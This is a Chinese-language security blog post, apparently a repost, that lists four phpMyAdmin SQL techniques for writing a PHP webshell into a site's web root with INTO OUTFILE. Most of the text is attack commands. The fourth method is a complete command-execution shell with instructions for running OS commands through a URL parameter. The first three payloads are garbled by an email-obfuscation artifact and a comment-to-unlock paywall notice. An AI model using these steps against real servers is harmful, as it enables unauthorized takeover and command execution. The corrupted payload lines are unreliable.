通过phpmyadmin各种技巧拿webshell

  • A+
所属分类:安全文章

第一种

  • CREATE TABLE`mysql`.`darkmoon`(`darkmoon1`TEXT NOTNULL);

  • INSERT INTO`mysql`.`darkmoon`(`darkmoon1`)VALUES(‘<[email protected]($_POST

    下载密码:发表评论并刷新可见!
    );?>’);

  • SELECT`darkmoon1`FROM`darkmoon`INTO OUTFILE’d:/wamp/www/exehack.php’;

  • DROP TABLE IFEXISTS`darkmoon`;

(这种方法是最为常见的成功率也比较高,懂sql语句的朋友一眼就应该可以看懂什么意思)

以上代码意思就是选择musql数据库 然后建立一个darkmoon的表然后加入一个名字为darkmoon1的字段

然后在darkmoon1的字段中插入一句话代码

然后从darkmoon1字段里面导出一句话到d:/wamp/www/exehack.php 的文件名(这里的路径就是网站的程序路径)

最后就是删除darkmoon这个表。

第二种方法

  • Create TABLE moon(darkmoon text NOTNULL);

  • Insert INTO moon(darkmoon)VALUES(‘<[email protected]($_POST

    下载密码:发表评论并刷新可见!
    );?>’);

  • select darkmoon from moon into outfile’d:/wamp/www/exehack.php’;

  • Drop TABLE IFEXISTS moon;

以上方法原理基本与方法一一致

第三种方法:

  • select'<[email protected]($_POST

    下载密码:发表评论并刷新可见!
    );?>’INTO OUTFILE’d:/wamp/www/exehack.php’

第四种方法

  • select'<?phpecho'<pre>’;system($_GET[’cmd’]);echo'</pre>’;?>’INTO OUTFILE’d:/wamp/www/exehack.php’

不同之处在于导出成功后可以直接执行DOS命令(只要权限够大)

使用方法:www.xxx.com/exehack.php?cmd=  (cmd=后面直接执行dos命令)

以上4种方法一般情况下足够拿到网站的webshell权限了。


本文始发于微信公众号(飓风网络安全):通过phpmyadmin各种技巧拿webshell

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: